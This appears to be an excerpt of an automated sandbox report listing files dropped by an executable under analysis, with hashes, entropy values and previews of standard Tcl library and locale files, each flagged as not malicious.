                                                                                                                                                                                                                                            SHA1:C62418071A6C9CB0DCE3F67E130BFD2FB7AB0B58
                                                                                                                                                                                                                                            SHA-256:50B62381D6EDD4219F4292BFDC365954491B23360DE7C08033E7218A3D29C970
                                                                                                                                                                                                                                            SHA-512:BF98305AA7D759A087B9EABDC404714D8DC6B4F1BEED4ED0E1FFE646641E1AECA307673D64CF95FD09546D977B3409D6C04F56DCCA1D6332B0D9B6DD460B77A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: tis-620, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E44
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8235
                                                                                                                                                                                                                                            Entropy (8bit):4.855903177272536
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Hf8PxPu7pUHBpqyzmY5rEk/fvs+AokFlTGHts1H/tsEGZPBtsLIVn++G:H6Pu7ELJTtyli8Ozz+L
                                                                                                                                                                                                                                            MD5:8609B624CD3EC63DD02DBF89455C3A9B
                                                                                                                                                                                                                                            SHA1:B3E1843E34C38AA668FFDDF435A1A65D55449CA0
                                                                                                                                                                                                                                            SHA-256:5123DB837EADF45712EA7D449BC40BFD3E8E16D3D71E7D0CE9A32F164973D767
                                                                                                                                                                                                                                            SHA-512:B20B75473F34209888F38EE570B8A96061760E88466DFC2EC55C814968DC7F67D92D255E8635188B60455B88F2D1D517747613AD0F366D60412D2D6ECE231B0E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# history.tcl --..#..# Implementation of the history command...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.....# The tcl::history array holds the history list and some additional..# bookkeeping variables...#..# nextid.the index used for the next history list item...# keep..the max size of the history list..# oldest.the index of the oldest item in the history.....namespace eval ::tcl {.. variable history.. if {![info exists history]} {...array set history {... nextid.0... keep.20... oldest.-20...}.. }.... namespace ensemble create -command ::tcl::history -map {...add.::tcl::HistAdd...change.::tcl::HistChange...clear.::tcl::HistClear...event.::tcl::HistEvent...info.::tcl::HistInfo...keep.::tcl::HistKeep...nextid.::tcl::HistNextID...redo.::tcl::HistRedo.. }..}.....# history --..#..#.This is the main history command. See the
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10066
                                                                                                                                                                                                                                            Entropy (8bit):4.806771544139381
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:kipkqA3KsZMAikGJ4kIWPa95KTBoF7dg/8YNkgQ4id:TkqWKsZ8kGJ4kIWPaDFzTd
                                                                                                                                                                                                                                            MD5:C2092F8CA2D761DFA8C461076D956374
                                                                                                                                                                                                                                            SHA1:90B4648B3BC81C30465B0BE83A5DB4127A1392FB
                                                                                                                                                                                                                                            SHA-256:8C474095A3ABA7DF5B488F3D35240D6DE729E57153980C2A898728B8C407A727
                                                                                                                                                                                                                                            SHA-512:09CE408886E2CEADDF70786A15D63AF9A930E70CAC4286AC9DDD2094C8EDCF97A2ADC2D3D2659B123F88719340D3B00D9F96E9BC7C8B55192735C290E7D24683
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# http.tcl..# Client-side HTTP for GET, POST, and HEAD commands...# These routines can be used in untrusted code that uses the Safesock..# security policy...# These procedures use a callback interface to avoid using vwait,..# which is not defined in the safe base...#..# See the http.n man page for documentation....package provide http 1.0....array set http {.. -accept */*.. -proxyhost {}.. -proxyport {}.. -useragent {Tcl http client package 1.0}.. -proxyfilter httpProxyRequired..}..proc http_config {args} {.. global http.. set options [lsort [array names http -*]].. set usage [join $options ", "].. if {[llength $args] == 0} {...set result {}...foreach name $options {... lappend result $name $http($name)...}...return $result.. }.. regsub -all -- - $options {} options.. set pat ^-([join $options |])$.. if {[llength $args] == 1} {...set flag [lindex $args 0]...if {[regexp -- $pat $flag]} {... return $http($flag)...} else {... return -code er
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):746
                                                                                                                                                                                                                                            Entropy (8bit):4.711041943572035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:jHx5XRsLzhjJS42wbGlTULuUAZb3KykszLl7+HkuRz20JSv6C3l5kMn:bHRsRJS42wbGlTUcZ+yk2Lli1z2jxXkM
                                                                                                                                                                                                                                            MD5:A387908E2FE9D84704C2E47A7F6E9BC5
                                                                                                                                                                                                                                            SHA1:F3C08B3540033A54A59CB3B207E351303C9E29C6
                                                                                                                                                                                                                                            SHA-256:77265723959C092897C2449C5B7768CA72D0EFCD8C505BDDBB7A84F6AA401339
                                                                                                                                                                                                                                            SHA-512:7AC804D23E72E40E7B5532332B4A8D8446C6447BB79B4FE32402B13836079D348998EA0659802AB0065896D4F3C06F5866C6B0D90BF448F53E803D8C243BBC63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl package index file, version 1.0..# This file is generated by the "pkg_mkIndex" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....package ifneeded http 1.0 [list tclPkgSetup $dir http 1.0 {{http.tcl source {httpCopyDone httpCopyStart httpEof httpEvent httpFinish httpMapReply httpProxyRequired http_code http_config http_data http_formatQuery http_get http_reset http_size http_status http_wait}}}]..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):25633
                                                                                                                                                                                                                                            Entropy (8bit):4.885492991636381
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:cXugPHudKlExBG+Xg3Qonlm6ofRRECLSQDjr5vkhzx/i:hgGdKli4eonlm6offLzehNi
                                                                                                                                                                                                                                            MD5:FE92C81BB4ACDDA00761C695344D5F1E
                                                                                                                                                                                                                                            SHA1:A87E1516FBD1F9751EC590273925CBC5284B16BD
                                                                                                                                                                                                                                            SHA-256:7A103A85413988456C2AD615C879BBCB4D91435BCFBBE23393E0EB52B56AF6E2
                                                                                                                                                                                                                                            SHA-512:C983076E420614D12AB2A7342F6F74DD5DCDAD21C7C547F660E73B74B3BE487A560ABD73213DF3F58BE3D9DBD061A12D2956CA85A58D7B9D9E40D9FA6E6C25EB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# init.tcl --..#..# Default system startup file for Tcl-based applications. Defines..# "unknown" procedure and auto-load facilities...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2004 Kevin B. Kenny. All rights reserved...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# This test intentionally written in pre-7.5 Tcl..if {[info commands package] == ""} {.. error "version mismatch: library\nscripts expect Tcl version 7.5b1 or later but the loaded version is\nonly [info patchlevel]"..}..package require -exact Tcl 8.6.13....# Compute the auto path to use in this interpreter...# The values on the path come from several locations:..#..# The environment variable TCLLIBPATH..#..# tcl_library, which is the directory containing this init.tcl script...# [t
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1038
                                                                                                                                                                                                                                            Entropy (8bit):4.10054496357204
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383Hcm0hH9BncmtR7tK9dUVxMmALfpKIdzVJLd3xfjTuLM+vzkHWZ6tH9H0:4aR838HH9ekCkMmEfpK2xx2jiWZ0VbY
                                                                                                                                                                                                                                            MD5:DA8BA1C3041998F5644382A329C3C867
                                                                                                                                                                                                                                            SHA1:CA0BD787A51AD9EDC02EDD679EEEEB3A2932E189
                                                                                                                                                                                                                                            SHA-256:A1EACA556BC0CFBD219376287C72D9DBBFAB76ECF9BF204FD02D40D341BAF7DA
                                                                                                                                                                                                                                            SHA-512:4F086396405FDFE7FBDA7614D143DE9DB41F75BDBD3DB18B1EE9517C3DCCED238DD240B4B64829FD04E50F602DBF371D42A321D04C4C48E4B8B2A067CA1BAF2E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Ma"\.. "Di"\.. "Wo"\.. "Do"\.. "Vr"\.. "Sa"].. ::msgcat::mcset af DAYS_OF_WEEK_FULL [list \.. "Sondag"\.. "Maandag"\.. "Dinsdag"\.. "Woensdag"\.. "Donderdag"\.. "Vrydag"\.. "Saterdag"].. ::msgcat::mcset af MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset af MONTHS_FULL [list \.. "Januarie"\.. "Februarie"\.. "Maart"\.. "April"\.. "Mei"\.. "Junie"\.. "Julie"\.. "Augustus"\.. "September"\.. "Oktober"\.. "November"\.. "Desember"\.. ""].. ::msgcat::mcset af AM "VM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.925537696653838
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xouFygMouFqF3v6ay/5ouFy9+3vR6HyFvn:4EnLB383RAgeYF3v6ay/RAI3voSVn
                                                                                                                                                                                                                                            MD5:1B9DCD1C6FCDDC95AE820EA8DA5E15B8
                                                                                                                                                                                                                                            SHA1:E8160353FD415BAB9FD5ACCA14E087C5E6AE836E
                                                                                                                                                                                                                                            SHA-256:1548988458BBF0DFCCC23B7487CEC0E9C64E4CC8E045723E50BEC37C454A8C81
                                                                                                                                                                                                                                            SHA-512:532AF060B95AED5E381B161BE56BC88D91A8F3DF2ACFD835491991F99FE752ADB4A3F93AB6D4E68F7042C28A3C1DD87A6312DFD9FFFAFD6ECE3F1B76837C5B7F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2018
                                                                                                                                                                                                                                            Entropy (8bit):4.477377447232708
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                                                                                                                            MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                                                                                                                            SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                                                                                                                            SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                                                                                                                            SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                                                            Entropy (8bit):4.872222510420193
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                                                                                                                            MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                                                                                                                            SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                                                                                                                            SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                                                                                                                            SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1851
                                                                                                                                                                                                                                            Entropy (8bit):4.08645484776227
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                                                                                                                            MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                                                                                                                            SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                                                                                                                            SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                                                                                                                            SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1851
                                                                                                                                                                                                                                            Entropy (8bit):4.083347689510237
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                                                                                                                            MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                                                                                                                            SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                                                                                                                            SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                                                                                                                            SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1851
                                                                                                                                                                                                                                            Entropy (8bit):4.084701680556524
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                                                                                                                            MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                                                                                                                            SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                                                                                                                            SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                                                                                                                            SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2157
                                                                                                                                                                                                                                            Entropy (8bit):4.27810535662921
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                                                                                                                            MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
                                                                                                                                                                                                                                            SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                                                                                                                            SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                                                                                                                            SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1871
                                                                                                                                                                                                                                            Entropy (8bit):4.4251657008559935
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                                                                                                                            MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                                                                                                                            SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                                                                                                                            SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                                                                                                                            SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2335
                                                                                                                                                                                                                                            Entropy (8bit):4.107102006297273
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                                                                                                                            MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                                                                                                                            SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                                                                                                                            SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                                                                                                                            SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                                                                                                                            Malicious:false
